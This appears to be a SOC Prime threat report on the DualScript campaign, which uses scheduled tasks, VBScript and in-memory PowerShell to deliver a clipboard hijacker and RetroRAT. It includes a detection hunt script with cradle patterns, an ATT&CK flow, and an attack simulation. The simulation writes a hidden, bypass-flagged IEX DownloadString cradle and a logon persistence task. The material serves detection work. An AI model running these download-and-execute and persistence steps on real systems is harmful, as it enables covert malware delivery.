SOC Prime Bias: Critical

31 Mar 2026 15:28

Operation DualScript: Multi-Stage PowerShell Malware Targeting Crypto and Finance

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The report outlines Operation DualScript, a multi-stage malware campaign that relies on scheduled-task persistence, VBScript launchers, and PowerShell loaders to deploy both a clipboard hijacker and the RetroRAT remote access trojan. The attackers store malicious PowerShell on external servers and run it fully in memory to reduce detection opportunities. RetroRAT records keystrokes, monitors active windows for finance-related keywords, and sends stolen data through a custom TCP C2 channel. The campaign is aimed at cryptocurrency activity and U.S. banking targets.

Investigation

Analysts discovered scheduled tasks configured to launch VBScript files from user-writable paths, which then executed hidden PowerShell with execution-policy bypass enabled. Two parallel delivery chains were identified: one retrieved a Wallet.txt script to hijack cryptocurrency clipboard contents, while the other loaded RetroRAT directly into memory. Static analysis also exposed anti-analysis logic, mutex creation, multi-threaded keylogging, and a hard-coded C2 handshake string.

Mitigation

Defenders should monitor for suspicious scheduled tasks that invoke VBScript or PowerShell with hidden windows and bypass arguments. Endpoint detection should focus on in-memory PowerShell execution, unusual clipboard monitoring behavior, and creation of unknown mutexes. Organizations should also block outbound traffic to the malicious domains and apply strict execution controls to PowerShell and VBScript.
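To turn the Investigation and Mitigation guidance above into a concrete hunt, here is an added PowerShell example (not code from the report or from SOC Prime). It enumerates scheduled tasks whose actions launch a script host or PowerShell with hidden-window, bypass or download-cradle arguments, or a .vbs/.js launcher stored in a user-writable path, and checks Event ID 4104 script blocks for the same cradle. The regex patterns, the verdict logic, the function names and the sample task actions are assumptions made for this example, not indicators from the campaign.

```powershell
# Hunt for the DualScript persistence chain: scheduled-task actions that launch a
# script host or PowerShell with hidden-window / bypass / download-cradle flags
# (or a .vbs/.js launcher from a user-writable path), and Event ID 4104 script
# blocks that carry the same download cradle. Patterns, verdict logic and the
# sample records below are assumptions made for this example, not report IOCs.

$CradlePatterns = @(
    '-WindowStyle\s+Hidden', '\s-w\s+h(idden)?\b',
    '-ExecutionPolicy\s+Bypass', '\s-ep\s+bypass\b',
    '\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}',
    '\bIEX\b', 'Invoke-Expression', 'DownloadString', 'DownloadFile',
    'Net\.WebClient', 'Invoke-WebRequest', '\biwr\b', 'Invoke-RestMethod'
)
$ScriptHosts  = 'wscript\.exe|cscript\.exe|mshta\.exe|powershell\.exe|pwsh\.exe'
$ScriptFiles  = '\.(vbs|vbe|js|jse|wsf|hta)("|\s|$)'
$UserWritable = '\\Users\\|\\AppData\\|\\Temp\\|\\ProgramData\\|\\Public\\|%(USERPROFILE|APPDATA|LOCALAPPDATA|TEMP|TMP)%'

function Test-SuspiciousCommand {
    # Verdict for one command line (a task action or a script block text).
    param([Parameter(Mandatory)][AllowEmptyString()][string]$CommandLine)
    $flags   = @(foreach ($p in $CradlePatterns) { if ($CommandLine -match $p) { $p } })
    $hasHost = $CommandLine -match $ScriptHosts
    $hasFile = $CommandLine -match $ScriptFiles
    $userDir = $CommandLine -match $UserWritable
    [pscustomobject]@{
        CommandLine = $CommandLine
        Flags       = $flags
        # A script host carrying cradle flags, or a script launcher living in a
        # user-writable directory (the DualScript VBScript), is the hit we want.
        Suspicious  = ($hasHost -and $flags.Count -gt 0) -or ($hasFile -and $userDir)
    }
}

function Find-SuspiciousScheduledTask {
    # Walks every registered task; emits one record per suspicious Exec action.
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler / e-mail actions have no Execute
            $cmd = "$($action.Execute) $($action.Arguments)".Trim()
            $verdict = Test-SuspiciousCommand -CommandLine $cmd
            if ($verdict.Suspicious) {
                [pscustomobject]@{
                    Task     = $task.TaskPath + $task.TaskName
                    RunAs    = $task.Principal.UserId
                    RunLevel = $task.Principal.RunLevel
                    Command  = $cmd
                    Flags    = $verdict.Flags -join ', '
                }
            }
        }
    }
}

function Find-DownloadCradleScriptBlock {
    # Event ID 4104 requires Script Block Logging; Properties[2] is ScriptBlockText.
    param([int]$MaxEvents = 5000)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    foreach ($e in Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue) {
        $text = [string]$e.Properties[2].Value
        if ($text -match '\bIEX\b|Invoke-Expression' -and
            $text -match 'DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b') {
            [pscustomobject]@{ Time = $e.TimeCreated; ProcessId = $e.ProcessId; ScriptBlock = $text }
        }
    }
}

# Constructed sample task actions (not from the report) so the verdict logic can
# be exercised offline; the last two are benign and must not fire.
$samples = @(
    'wscript.exe "C:\Users\alice\dual.vbs"',
    'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString(''http://example.com/payload.ps1'')"',
    'C:\Windows\System32\svchost.exe -k netsvcs',
    'powershell.exe -NoProfile -File "C:\Program Files\Contoso\backup.ps1"'
)
$samples | ForEach-Object { Test-SuspiciousCommand $_ } |
    Format-Table Suspicious, @{ n = 'Flags'; e = { $_.Flags -join ', ' } }, CommandLine -AutoSize

# Live hunt on a host:  Find-SuspiciousScheduledTask | Format-Table -AutoSize
#                       Find-DownloadCradleScriptBlock | Format-List
```

The first two samples fire (a .vbs launcher under \Users\, and a hidden/bypass PowerShell with an IEX DownloadString cradle); the svchost and signed-path .ps1 actions do not. Get-ScheduledTask needs the ScheduledTasks module (Windows 8 / Server 2012 and later), and the 4104 search only finds anything if Script Block Logging is turned on, so enable it before relying on that leg of the hunt.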

Response

If this activity is detected, isolate the affected host, disable the malicious scheduled tasks, and remove any persisted VBScript or PowerShell artifacts. Perform a full forensic sweep for the RetroRAT payload, captured keystroke data, and related C2 traffic. Reset exposed cryptocurrency wallet information and change banking credentials. Restore affected systems from clean backups and block the identified domains and IP addresses at the network layer.

Attack Flow

    graph TB
    %% Class definitions
    classDef technique fill:#d1e8ff
    classDef file fill:#ffe6cc
    classDef malware fill:#ffcccc
    classDef process fill:#e2ffd6
    %% Nodes – Techniques
    tech_persistence["<b>Technique</b> – <b>T1053 Scheduled Task/Job</b><br/><b>Description</b>: Creates a Windows scheduled task that runs a VBScript launcher in hidden mode for persistence."]
    class tech_persistence technique
    tech_execution["<b>Technique</b> – <b>T1059.001 PowerShell</b><br/><b>Description</b>: Executes PowerShell code via execution-policy bypass and runs it directly in memory."]
    class tech_execution technique
    tech_defense["<b>Technique</b> – <b>T1497.002 Virtualization Sandbox Evasion</b><br/><b>Description</b>: Checks for sandbox usernames and VM artifacts; aborts if such an environment is detected."]
    class tech_defense technique
    tech_download["<b>Technique</b> – <b>T1102 Web Service</b><br/><b>Description</b>: Retrieves a remote payload (Wallet.txt) over HTTPS and converts it to a ScriptBlock for in-memory execution."]
    class tech_download technique
    tech_clipboard["<b>Technique</b> – <b>T1115 Clipboard Data</b> and <b>T1204.004 Malicious Copy and Paste</b><br/><b>Description</b>: Monitors the system clipboard and replaces legitimate cryptocurrency addresses with attacker-controlled wallets."]
    class tech_clipboard technique
    tech_keylog["<b>Technique</b> – <b>T1056.001 Keylogging</b><br/><b>Description</b>: Installs a low-level keyboard hook to capture keystrokes during financial sessions."]
    class tech_keylog technique
    tech_screen["<b>Technique</b> – <b>T1113 Screen Capture</b><br/><b>Description</b>: Records screenshots or streams the desktop for visual monitoring of victim activity."]
    class tech_screen technique
    tech_c2["<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/><b>Description</b>: Sends harvested keystrokes, clipboard data and logs to a hard-coded C2 server using a TCP client."]
    class tech_c2 technique
    tech_process["<b>Technique</b> – <b>T1543 Create or Modify System Process</b><br/><b>Description</b>: Scheduled task spawns a new process for the PowerShell payload and later creates additional threads for parallel functions."]
    class tech_process technique
    tech_rdp["<b>Technique</b> – <b>T1219.002 Remote Desktop Software</b><br/><b>Description</b>: Enables the attacker to view or control the victim desktop through the RetroRAT component."]
    class tech_rdp technique
    tech_inputinj["<b>Technique</b> – <b>T1674 Input Injection</b><br/><b>Description</b>: Injects attacker-controlled wallet strings into the clipboard before the victim pastes the content."]
    class tech_inputinj technique
    %% Nodes – Artifacts
    file_vbscript["<b>File</b> – <b>Name</b>: ppamproServiceZuneWAL.vbs / PiceVid.vbs<br/><b>Purpose</b>: Launches the PowerShell payload in hidden mode."]
    class file_vbscript file
    malware_retro["<b>Malware</b> – <b>Name</b>: RetroRAT<br/><b>Function</b>: Provides remote desktop and command execution capabilities."]
    class malware_retro malware
    %% Connections – Flow
    tech_persistence -->|creates| file_vbscript
    file_vbscript -->|launches| tech_execution
    tech_execution -->|uses| tech_download
    tech_download -->|delivers payload to| tech_process
    tech_process -->|spawns| tech_keylog
    tech_process -->|spawns| tech_screen
    tech_process -->|spawns| tech_clipboard
    tech_clipboard -->|enables| tech_inputinj
    tech_keylog -->|exfiltrates via| tech_c2
    tech_screen -->|exfiltrates via| tech_c2
    tech_clipboard -->|exfiltrates via| tech_c2
    tech_process -->|starts| tech_rdp
    tech_rdp -->|communicates with| tech_c2
    tech_rdp -->|runs| malware_retro
    tech_defense -->|checks before| file_vbscript

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The attacker first stages a VBScript (dual.vbs) in the user's profile directory. The script launches PowerShell with -WindowStyle Hidden and -ExecutionPolicy Bypass and then downloads and executes a remote payload; the simulation points that download cradle at a placeholder URL, so the fetch is expected to fail harmlessly while still producing the launch chain and command line the rule keys on. To achieve persistence, the attacker registers a scheduled task (DualScriptPersist) that runs the VBScript at logon. With PowerShell Script Block Logging enabled, the simulation script itself and the hidden PowerShell spawned by the VBScript each write an Event ID 4104 entry; these are the two correlated 4104 entries the rule looks for.

  • Regression Test Script:

    # -------------------------------------------------
    # DualScript Attack Simulation – PowerShell
    # -------------------------------------------------
    # 1️⃣ Create malicious VBScript in a user-writable path
    $vbsPath    = "$env:USERPROFILE\dual.vbs"
    $payloadUrl = "http://example.com/payload.ps1"   # placeholder URL; the fetch is expected to fail
    # Inside the VBScript string literal, embedded double quotes are doubled ("").
    # "0, False" runs the PowerShell window hidden without waiting for it to exit.
    # The closing "@ of the here-string must start in column 1.
    $vbsContent = @"
    WScript.Sleep 500
    Dim sh
    Set sh = CreateObject("WScript.Shell")
    sh.Run "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command ""IEX (New-Object Net.WebClient).DownloadString('$payloadUrl')""", 0, False
    "@
    $vbsContent | Set-Content -Path $vbsPath -Encoding ASCII
    
    # 2️⃣ Register a scheduled task that runs the VBScript at every user logon
    #    (the ScheduledTasks cmdlets avoid the quoting pitfalls of schtasks /TR;
    #    -RunLevel Highest needs an elevated prompt, omit it to register as a standard user)
    $taskName    = "DualScriptPersist"
    $taskAction  = New-ScheduledTaskAction -Execute "wscript.exe" -Argument "`"$vbsPath`""
    $taskTrigger = New-ScheduledTaskTrigger -AtLogOn
    Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -RunLevel Highest -Force | Out-Null
    
    # 3️⃣ Force the task to run immediately (trigger detection)
    Start-ScheduledTask -TaskName $taskName
    
    Write-Host "`n[+] DualScript simulation executed. Check your SIEM for alerts."
    # -------------------------------------------------
  • Cleanup Commands:

    # -------------------------------------------------
    # DualScript Simulation Cleanup
    # -------------------------------------------------
    $taskName = "DualScriptPersist"
    $vbsPath  = "$env:USERPROFILE\dual.vbs"
    
    # Delete the scheduled task (no-op if it was already removed)
    Unregister-ScheduledTask -TaskName $taskName -Confirm:$false -ErrorAction SilentlyContinue
    
    # Remove the VBScript file
    Remove-Item -Path $vbsPath -Force -ErrorAction SilentlyContinue
    
    Write-Host "`n[+] Cleanup completed."
    # -------------------------------------------------